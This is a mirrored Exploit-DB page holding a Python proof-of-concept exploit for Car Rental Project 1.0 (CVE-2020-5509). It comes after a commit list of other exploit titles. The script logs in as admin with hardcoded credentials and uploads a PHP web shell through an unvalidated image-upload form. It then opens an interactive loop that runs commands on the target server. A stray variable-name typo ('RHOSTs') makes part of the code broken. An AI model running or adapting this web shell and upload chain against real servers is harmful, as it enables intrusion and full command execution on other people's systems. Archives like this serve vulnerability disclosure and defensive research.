bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52243.py
Exploit-DB 7ebfc36557 DB: 2025-04-17 
24 changes to exploits/shellcodes/ghdb

ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)

Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account

Dell EMC iDRAC7/iDRAC8 2.52.52.52 -  Remote Code Execution (RCE)

FLIR AX8 1.46.16  - Remote Command Injection

ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)

Ethercreative Logs 3.0.3 - Path Traversal

Garage Management System 1.0 (categoriesName) - Stored XSS

Nagios Log Server 2024R1.3.1 - Stored XSS

ProConf 6.0 -  Insecure Direct Object Reference (IDOR)

Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)

WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php)  - File Write DoS
ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS
ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution

Car Rental Project 1.0 - Remote Code Execution

KodExplorer 4.52 - Open Redirect

NagVis 1.9.33 - Arbitrary File Read
phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames

Smart Manager 8.27.0 - Post-Authenticated SQL Injection

Zabbix 7.0.0 - SQL Injection

Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)

Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass

WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
2025-04-17 00:16:29 +00:00

91 lines
No EOL
3.7 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Car Rental Project 1.0 - Remote Code Execution
# Date: 1/3/2020
# Exploit Author: FULLSHADE, SC
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2020-5509
# ==================================================
# Information & description
# ==================================================
# Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.
# ==================================================
# Manual POC
# ==================================================
# Manual POC method
# - Visit carrental > admin login > changeimage1.php
# - Upload a php rce vulnerable payload
# - Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
# - Execute commands on the server
# ==================================================
# POC automation script
# ==================================================
import sys
import requests
print("""
+-------------------------------------------------------------+
Car Rental Project v1.0 - Remote Code Execution
FULLSHADE, FullPwn Operations
+-------------------------------------------------------------+
""")
def login():
sessionObj = requests.session()
RHOSTS = sys.argv[1]
bigstring = "\n+-------------------------------------------------------------+\n"
print("+-------------------------------------------------------------+")
print("[+] Victim host: {}".format(RHOSTs))
POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
# login / authentication
payload = {"username": "admin", "password": "Test@12345", "login": ""}
login = sessionObj.post(POST_AUTH_LOGIN, data=payload)
# get response
if login.status_code == 200:
print("[+] Login HTTP response code: 200")
print("[+] Successfully logged in")
else:
print("[!] Failed to authenticate")
sys.exit()
# get session token
session_cookie_dic = sessionObj.cookies.get_dict()
token = session_cookie_dic["PHPSESSID"]
print("[+] Session cookie: {}".format(token))
# proxy for Burp testing
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# data for uploading the backdoor request
backdoor_file = {
"img1": (
"1dccadfed7bcbb036c56a4afb97e906f.php",
'<?php system($_GET["cmd"]); ?>',
"Content-Type application/x-php",
)
}
backdoor_data = {"update": ""}
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
# actually upload the php shell
try:
r = sessionObj.post(url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data)
print("[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring)
except:
print("[!] Failed to upload backdoor")
# get command execution
while True:
COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
SHELL_LOCATION = "http://" + RHOSTS + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
# get R,CE results
respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
print(respond.text)
if __name__ == "__main__":
login()
Reference in a new issue View git blame Copy permalink